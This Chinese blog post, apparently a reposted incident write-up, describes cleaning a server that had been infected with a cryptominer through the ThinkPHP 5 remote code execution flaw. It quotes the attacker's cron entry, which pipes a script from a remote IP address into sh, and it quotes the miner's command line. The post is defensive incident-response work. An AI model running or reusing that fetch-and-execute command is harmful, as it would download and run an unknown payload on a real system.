如何處理一個(gè)利用thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞挖礦的木馬

發(fā)布時(shí)間：2021-04-07 09:29:43 來源：億速云閱讀：213 作者：小新欄目：編程語言

小編給大家分享一下如何處理一個(gè)利用thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞挖礦的木馬，希望大家閱讀完這篇文章之后都有所收獲，下面讓我們一起去探討吧！

記一次掛馬清除經(jīng)歷：處理一個(gè)利用thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞挖礦的木馬

昨天發(fā)現(xiàn) 一臺(tái)服務(wù)器突然慢了 top 顯示幾個(gè)進(jìn)程100%以上的cpu使用

執(zhí)行命令為 :

/tmp/php  -s /tmp/p2.conf

基本可以確定是被掛馬了

下一步確定來源

last 沒有登陸記錄

先干掉這幾個(gè)進(jìn)程，但是幾分鐘之后又出現(xiàn)了

先看看這個(gè)木馬想干什么吧

netstat 看到這個(gè)木馬開啟了一個(gè)端口和國外的某個(gè)ip建立了連接

但是tcpdump了一小會(huì)兒沒有發(fā)現(xiàn)任何數(shù)據(jù)傳遞

這他是想干啥？

繼續(xù)查看日志吧

在cron日志中發(fā)現(xiàn)了www用戶有一個(gè)crontab定時(shí)操作基本就是這個(gè)問題了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

順著下載了幾個(gè)問題，看了看應(yīng)該是個(gè)挖礦的木馬程序

服務(wù)器上的www用戶是安裝 lnmp 創(chuàng)建的，看了來源很可能就是web漏洞了。

再看/tmp下的php的權(quán)限就是www的

查看 lnmp下幾個(gè)站的日志發(fā)現(xiàn)是利用 thinkphp 5最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞

修復(fù)一下問題解決

看完了這篇文章，相信你對“如何處理一個(gè)利用thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞挖礦的木馬”有了一定的了解，如果想了解更多相關(guān)知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道，感謝各位的閱讀！

向AI問一下細(xì)節(jié)

猜你喜歡